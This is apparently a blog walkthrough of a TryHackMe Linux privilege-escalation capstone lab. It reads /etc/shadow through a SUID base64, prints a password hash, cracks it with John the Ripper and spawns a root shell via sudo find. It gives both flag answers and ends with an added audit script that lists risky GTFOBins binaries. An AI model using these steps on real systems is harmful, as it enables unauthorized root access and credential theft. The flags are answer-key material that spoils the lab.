This article discusses the solution for TryHackMe's Linux Privilege Escalation Kernel Capstone Challenge tasks, so proceed with caution if you have not finished it yet.
I would suggest that you try to solve it on your own, as you will learn a lot in the process of attempting it. Give it your all until you feel that you are really, hopelessly stuck.
Linux Privilege Escalation: Capstone Challenge Solution
What is the content of the flag1.txt file?
- Let's first gather some information about the machine:
history
whoami
uname -a
uname -r
cat /proc/version
cat /etc/issue
ps
sudo -l
ls
id
ifconfig
netstat -a
netstat -at
netstat -au
netstat -l
env
Let's go to /home, where we discover two other users, `missy` and `rootflag`. From the history we know that flag2.txt belongs to the `rootflag` user, so chances are that flag1.txt is in /home/missy. Let's first do a quick search for a kernel exploit for version 3.10.0-1160.el7.x86_64.
Let's check for sudo rights:
sudo -l
Unfortunately `leonard` has no sudo rights. Next, check for SUID binaries:
find / -type f -perm -04000 -ls 2>/dev/null
There are multiple binaries with the SUID bit set that our current user can run. Let's go to https://gtfobins.github.io/#+suid to check whether any of them can be exploited for root access.
We can exploit `base64` to read /etc/passwd and /etc/shadow and find information about user `missy`. Unfortunately we can't find any info about `rootflag` in these files.
LFILE=/etc/passwd
base64 "$LFILE" | base64 --decode
missy:x:1001:1001::/home/missy:/bin/bash
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
missy:$6$BjOlWE21$HwuDvV1iSiySCNpA3Z9LxkxQEqUAdZvObTxJxMoCp/9zRVCi6/zrlMlAQPAxfwaD2JCUypk4HaNzI3rPVqKHb/:18785:0:99999:7:::
Let's try cracking the password for `missy`. Create local files passwd.txt and shadow.txt and copy the content from the target machine into them. Unshadow the files:
unshadow passwd.txt shadow.txt > passwords.txt
Run John the Ripper on passwords.txt, where we find that the password for `missy` is Password1:
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
- Now, on the target machine, let's switch to user `missy` using the password Password1:
su missy
cd /home/missy/Documents
cat flag1.txt
Answer: THM-42828719920544
What is the content of the flag2.txt file?
Continuing from what we have done above, the current user is now `missy`. Let's check her privileges by running `sudo -l`. We find that user `missy` has sudo privileges for `find`. Looking at https://gtfobins.github.io/#+sudo, we discover that there is a sudo entry for the `find` binary. Let's execute what we found in GTFOBins, which spawns a shell with root privileges:
sudo find . -exec /bin/sh \; -quit
- Now let's read the content of flag2.txt, which is found in /home/rootflag.
Answer: THM-168824782390238
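As an added example that is not part of the original write-up, the following POSIX shell script audits a host for the two misconfigurations used in the flag1 and flag2 steps above: a SUID bit on a file-reading binary such as `base64`, and a sudo rule for a shell-spawning binary such as `find`. The `RISKY_BINS` list is a hand-picked subset of GTFOBins, and the functions take `find -ls` output and sudoers-style lines as input.

```shell
#!/bin/sh
# Added audit script (not from the write-up). It checks for the two
# misconfigurations this room relied on: a SUID bit on a binary that can
# read arbitrary files (base64) and a sudo rule for a binary that can
# spawn a shell (find). RISKY_BINS is a small hand-picked subset of the
# GTFOBins SUID/sudo lists; sample inputs used for testing are constructed.

RISKY_BINS="base64 find vim nano less more cp mv python perl awk env bash sh tar"

# is_risky NAME: succeeds when NAME is one of RISKY_BINS
is_risky() {
  for r in $RISKY_BINS; do
    if [ "$1" = "$r" ]; then return 0; fi
  done
  return 1
}

# flag_suid: reads 'find / -type f -perm -04000 -ls' output on stdin and
# prints each path whose basename is risky (fix: chmod u-s PATH, or give
# the job to a sudo rule with fixed arguments instead of a SUID bit).
flag_suid() {
  while read -r line; do
    [ -n "$line" ] || continue
    path=${line##* }               # last field of 'find -ls' output is the path
    if is_risky "${path##*/}"; then printf '%s\n' "$path"; fi
  done
}

# flag_sudoers: reads sudoers-style lines on stdin and prints "USER CMD" for
# rules of the shape 'USER HOST=(RUNAS) [TAG:] CMD[, CMD...]' where CMD is
# ALL or a risky binary (fix: pin the arguments or call a reviewed wrapper).
flag_sudoers() {
  while read -r line; do
    case $line in ''|'#'*|Defaults*) continue ;; esac
    user=${line%% *}
    rest=${line##*\)}              # drop 'USER HOST=(RUNAS)'
    cmds=${rest##*:}               # drop tag list such as 'NOPASSWD:'
    for c in $(printf '%s' "$cmds" | tr ',' ' '); do
      if [ "$c" = ALL ] || is_risky "${c##*/}"; then
        printf '%s %s\n' "$user" "$c"
      fi
    done
  done
}

# Usage on a live host (run as root to see everything):
#   find / -type f -perm -04000 -ls 2>/dev/null | flag_suid
#   cat /etc/sudoers /etc/sudoers.d/* 2>/dev/null | flag_sudoers
```

Flagged entries are candidates for review rather than proof of compromise; a SUID `passwd` is expected, a SUID `base64` is not.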
Until next time. Keep learning.
Stay stoked and code. :)
I hope you can voluntarily Buy Me A Coffee if you found this article useful and give additional support for me to continue sharing more content for the community. :)
Thank you very much. :)